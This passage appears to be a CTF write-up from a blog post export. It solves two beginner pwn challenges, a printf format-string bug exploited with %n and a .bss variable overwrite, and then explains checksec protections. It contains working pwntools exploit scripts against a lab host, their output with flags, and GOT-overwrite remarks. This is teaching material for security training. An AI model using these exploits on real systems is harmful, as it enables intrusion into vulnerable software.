__int16 v6; \/\/ [esp+26h] [ebp-76h]\n  char s; \/\/ [esp+28h] [ebp-74h]\n  unsigned int v8; \/\/ [esp+8Ch] [ebp-10h]\n\n  v8 = __readgsdword(0x14u);\n  setbuf(stdin, 0);\n  setbuf(stdout, 0);\n  setbuf(stderr, 0);\n  buf = 0;\n  v5 = 0;\n  v6 = 0;\n  memset(&amp;s, 0, 0x64u);\n  puts(&quot;please tell me your name:&quot;);\n  read(0, &amp;buf, 0xAu);\n  puts(&quot;leave your message please:&quot;);\n  fgets(&amp;s, 100, stdin);\n  printf(&quot;hello %s&quot;, &amp;buf);\n  puts(&quot;your message is:&quot;);\n  printf(&amp;s);\n  if ( pwnme == 8 )\n  {\n    puts(&quot;you pwned me, here is your flag:\\n&quot;);\n    system(&quot;cat flag&quot;);\n  }\n  else\n  {\n    puts(&quot;Thank you!&quot;);\n  }\n  return 0;\n}<\/code><\/pre>\n<p>\u5206\u6790\u4ee3\u7801\uff0c\u5f88\u660e\u663e\u8981\u8ba9pwnme\u7684\u503c\u53d8\u4e3a8\uff0c\u5f80\u4e0a\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n<pre><code class=\"language-c\">printf\uff08&amp;s\uff09;<\/code><\/pre>\n<p>\u8fd9\u4e2a\u5f62\u5f0f\u7684printf\u4e5f\u662f\u53ef\u4ee5\u5b9e\u73b0\u7684\uff0c\u4f46\u662f\u4e0d\u5b89\u5168\uff0c\u4f1a\u6709\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u3002<\/p>\n<blockquote>\n<p><code>\u9700\u8981\u6ce8\u610f\u7684\u662f**%n**\u8fd9\u4e2a\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\uff0c\u5b83\u7684\u529f\u80fd\u662f\u5c06%n\u4e4b\u524d\u6253\u5370\u51fa\u6765\u7684\u5b57\u7b26\u4e2a\u6570\uff0c\u8d4b\u503c\u7ed9\u4e00\u4e2a\u53d8\u91cf<\/code><\/p>\n<pre><code class=\"language-c\">printf(\"Hello World%n\", &a);\n\/\/a = 11\nprintf(\"AAAA%2$n\", &argu1, &argu2, 
&argu3......);\n\/\/\u4f7f\u7528'$'\u7b26\u53f7\u6765\u8fdb\u884c\u53c2\u6570\u7684\u9009\u62e9,\u4ee3\u8868\u7684\u662f\u5c06\u6253\u5370\u5b57\u7b26\u7684\u4e2a\u6570\u5199\u5165\u53c2\u65702\u5bf9\u5e94\u7684\u5730\u5740\u5185\u5b58\u4e2d.<\/code><\/pre>\n<\/blockquote>\n<p>\u53ef\u4ee5\u60f3\u5230\uff0c\u628a<code>pwnme<\/code>\u653e\u5230<code>message<\/code>\uff0c\u52a0\u4e00\u4e2a<code>%n<\/code>\uff0c\u4f7f\u5176\u4e0e\u8f93\u5165\u5730\u5740\u5bf9\u5e94\u4ece\u800c\u5229\u7528\u6f0f\u6d1e\u3002<\/p>\n<p>\u540c\u65f6\u70b9\u51fbpwnme\u627e\u5230\u5730\u5740\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018250.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018250.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218171508180\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6211\u4eec\u5f97\u67e5\u4e00\u4e0b\u6211\u4eec\u8f93\u5165\u8fdb\u53bb\u7684\u6570\u636e\u5728\u6808\u4e2d\u504f\u79fb\u4e86\u591a\u5c11\uff0c\u77e5\u9053\u504f\u79fb\u91cf\u540e\u6211\u4eec\u624d\u80fd\u5c06\u5176\u5bf9\u5e94\u8d77\u6765\uff0c\u5411message\u91cc\u8f93\u5165\uff1a<\/p>\n<pre><code class=\"language-c\">AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p<\/code><\/pre>\n<blockquote>\n<p><code>%d - \u5341\u8fdb\u5236 - \u8f93\u51fa\u5341\u8fdb\u5236\u6574\u6570 %s - \u5b57\u7b26\u4e32 - \u4ece\u5185\u5b58\u4e2d\u8bfb\u53d6\u5b57\u7b26\u4e32 %x - \u5341\u516d\u8fdb\u5236 - 
prints a hexadecimal number %c - character - prints a character %p - pointer - pointer address %n - number of characters written so far<\/code><\/p>\n<\/blockquote>\n<p>[image: image-20220218172248219]<\/p>\n<p>The <code>0x41414141<\/code> here is our <code>AAAA<\/code>, so the format-string parameter offset is 10. Write an exp.py:<\/p>\n<pre><code class=\"language-python\">#exp.py\nfrom pwn import *\nsh = remote(&#039;111.200.241.244&#039;,55428)\nsh.recv()\nsh.sendline(b&#039;aaa&#039;)\nsh.recv()\n# target address (4 bytes, little-endian), 4 bytes of padding, then %10$n\n# writes the number of bytes printed so far into the address found at offset 10\npayload = p32(0x804a068) + b&#039;aaaa&#039; + b&#039;%10$n&#039;\nsh.sendline(payload)\nsh.interactive()<\/code><\/pre>\n<p>Flag obtained:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ python exp.py          \n[+] Opening connection to 111.200.241.244 on port 55428: Done\n\/home\/kali\/Desktop\/exp.py:5: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  sh.sendline(&#039;aaa&#039;)\n\/home\/kali\/Desktop\/exp.py:8: BytesWarning: Text is not bytes; assuming ISO-8859-1, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  sh.sendline(payload)\n[*] Switching to interactive mode\nleave your message please:\nhello aaa\nyour message is:\nh\\xa0\\x04aaaa\nyou pwned me, here is your flag:\n\ncyberpeace{6bcb8a8d21137c4daa3263d1953b7d00}\n[*] Got EOF while reading in interactive\n$  <\/code><\/pre>\n<h2>hello_pwn<\/h2>\n<p>[image: image-20220218172720643]<\/p>\n<p>Check the basic information:<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ checksec hello_pwn\n[*] &#039;\/home\/baoyujie\/\u684c\u9762\/hello_pwn&#039;\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x400000)\nPwn@ubuntu:~\/\u684c\u9762$ file hello_pwn \nhello_pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 2.6.32, BuildID[sha1]=05ef7ecf06e02e7f199b11c4647880e8379e6ce0, stripped\nPwn@ubuntu:~\/\u684c\u9762$ .\/hello_pwn\n~~ welcome to ctf ~~     \nlets get helloworld for bof\naaa<\/code><\/pre>\n<p>Open it in IDA:<\/p>\n<pre><code class=\"language-c\">\/\/ main function\n__int64 __fastcall main(__int64 a1, char **a2, char **a3)\n{\n  alarm(0x3Cu);\n  setbuf(stdout, 0LL);\n  puts(&quot;~~ welcome to ctf ~~     &quot;);\n  puts(&quot;lets get helloworld for bof&quot;);\n  read(0, &amp;unk_601068, 0x10uLL);   \/\/ 0x10 bytes into .bss; dword_60106C sits 4 bytes after unk_601068\n  if ( dword_60106C == 1853186401 )\n    sub_400686(0LL, &amp;unk_601068);\n  return 0LL;\n}<\/code><\/pre>\n<p>[image: image-20220218173840934]<\/p>\n<pre><code class=\"language-c\">\/\/ sub_400686()\n__int64 sub_400686()\n{\n  system(&quot;cat flag.txt&quot;);\n  return 0LL;\n}<\/code><\/pre>\n<p>We can see that when the variable <strong>dword_60106C<\/strong> equals <strong>1853186401<\/strong>, the program prints the flag.<\/p>\n<p>Both <strong>dword_60106C<\/strong> and <strong>unk_601068<\/strong> live in the .bss section, and <strong>dword_60106C<\/strong> sits four bytes after <strong>unk_601068<\/strong>. <strong>unk_601068<\/strong> is filled by our input, and the read accepts 0x10 bytes, which is exactly enough to overwrite <strong>dword_60106C<\/strong> and set it to <strong>1853186401<\/strong>.<\/p>\n<p>Write the exp:<\/p>\n<pre><code class=\"language-python\">#exp.py\nfrom pwn import *\np = remote(&#039;111.200.241.244&#039;,64131)\n# 4 bytes of filler for unk_601068, then the target value lands on dword_60106C\npayload = b&#039;a&#039;*4 + p64(1853186401)\np.recvuntil(b&quot;bof&quot;)\np.sendline(payload)\np.interactive()<\/code><\/pre>\n<p>Flag obtained:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ python exp.py\n[+] Opening connection to 111.200.241.244 on port 64131: Done\n\/home\/kali\/Desktop\/exp.py:5: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  p.recvuntil(&quot;bof&quot;)\n\/home\/kali\/Desktop\/exp.py:6: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  p.sendline(payload)\n[*] Switching to interactive mode\ncyberpeace{27b2ba0d58bf0f61749f897d8022823a}\n[*] Got EOF while reading in interactive\n$  <\/code><\/pre>\n<h2>Supplement<\/h2>\n<p>From <a href=\"https:\/\/blog.csdn.net\/qq_43430261\">GitCloud<\/a>'s article <a href=\"https:\/\/blog.csdn.net\/qq_43430261\/article\/details\/105516051?spm=1001.2101.3001.6650.2&amp;utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ELandingCtr%7EHighlightScore-2.queryctrv2&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ELandingCtr%7EHighlightScore-2.queryctrv2\">PWN: installing and using the latest checksec<\/a><\/p>\n<h3>Arch<\/h3>\n<p>Program architecture: tells you whether the binary is 64-bit or 32-bit, and therefore whether to use p64 or p32 when writing the exp.<\/p>\n<h3>RELRO<\/h3>\n<p><code>Relocation Read-Only (RELRO)<\/code> is a mitigation aimed at GOT-overwrite attacks. It comes in two forms, <code>Partial RELRO<\/code> and <code>Full RELRO<\/code>.<br \/>\n<code>Partial RELRO<\/code> is still vulnerable: for example, an attacker can overwrite <code>atoi.got<\/code> with <code>system.plt<\/code> and then input <code>\/bin\/sh<\/code> to get a shell. Full RELRO makes the whole GOT read-only so it cannot be overwritten, but this greatly increases the program's start-up time, because every symbol must be resolved before the program starts.<\/p>\n<h3>Stack<\/h3>\n<p><strong>Stack<\/strong>: stack-overflow check that detects corruption by whether the <strong>Canary<\/strong> value has changed; Canary found means it is enabled.<\/p>\n<p>The name comes from miners, who once used canaries to detect gas leaks: if the canary died of gas poisoning, the miners were warned. Here it is a buffer-overflow mitigation: with stack protection enabled, a cookie is placed on the stack when a function starts executing, and when the function actually returns the cookie is checked; if it is invalid, the program is stopped. When an attacker overwrites the return address, the cookie is usually overwritten as well, so the stack-protector check fails and the shellcode never executes. On Linux this cookie is called the Canary.<\/p>\n<h3>NX<\/h3>\n<p>NX enabled: when this protection is on, data on the stack has no execute permission, so when an attacker places their own shellcode on the stack or heap and triggers it, the program simply crashes. It can, however, be bypassed with ROP.<\/p>\n<h3>PIE<\/h3>\n<p>PIE (Position-Independent Executable) is similar to ASLR. ASLR randomizes the load addresses of the stack, the heap and the shared libraries at run time, while PIE compiles the program itself as position-independent, so the virtual addresses at which its segments (such as the code segment) are loaded are also decided only at load time. With PIE and ASLR both enabled, the attacker knows nothing about the program's memory layout, and the classic GOT-entry overwrite becomes hard to carry out, because the attacker cannot obtain the virtual address of the program's .got section. If PIE is enabled, an attack usually first has to leak enough address information.<\/p>\n<h3>RPATH\/RUNPATH<\/h3>\n<p>A run-time environment variable of the program: the shared libraries it needs at run time are looked up in this directory first, so a fake lib can be used for an attack. Example: <a href=\"https:\/\/www.jianshu.com\/go-wild?ac=2&amp;url=https:\/\/www.contextis.com\/en\/blog\/linux-privilege-escalation-via-dynamically-linked-shared-object-library\">attack case study<\/a><\/p>\n<h3>FORTIFY<\/h3>\n<p>This is a source-level protection implemented by GCC; it checks the source at compile time to avoid potential errors such as buffer overflows.<br \/>\nSimply put, once this protection is enabled, sensitive functions that may lead to vulnerabilities, such as read, fgets, memcpy and printf, are replaced by __read_chk, __fgets_chk and so on.<br \/>\nThese _chk functions check whether the number of bytes read or copied exceeds the buffer length, check whether a format string containing %n resides at a writable address that the user could modify, and reject format strings that skip arguments directly (e.g. %7$x), thereby preventing the vulnerability. A program with FORTIFY enabled is detected by checksec; in addition, looking at the GOT during decompilation also reveals the _chk functions. This check is not enabled by default and has to be turned on at compile time.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Attack and Defense World beginner area: PWN. pwn often requires IDA; for its common commands, see the article IDA basic usage. le 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,19],"tags":[],"class_list":["post-343","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-pwn"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/343","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=343"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/343\/revisions"}],"predecessor-version":[{"id":344,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/343\/revisions\/344"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=343"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=343"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=343"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}